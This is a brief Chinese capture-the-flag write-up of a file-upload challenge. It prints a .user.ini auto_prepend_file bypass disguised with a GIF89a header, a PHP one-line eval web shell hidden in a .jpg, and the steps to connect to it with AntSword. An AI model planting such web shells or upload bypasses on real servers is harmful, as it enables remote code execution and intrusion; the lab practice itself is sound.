这是一道文件上传题,我参考了很多wp才做出来,他们都写得很好,我这里只记录一下我的解题顺序:
上传.user.ini文件
这个文件内容为:
GIF89a
auto_prepend_file=a.jpg
bp抓包
点击左上角forward,浏览器显示:
上传a.jpg
a.jpg就是一句话木马,内容为:
GIF89a
<?=eval($_POST['cmd']);?>
查看文件去向
GET里头就是我们要连接的对象链接:
http://61.147.171.105:53836/uploads/index.php |
蚁剑连接
得到flag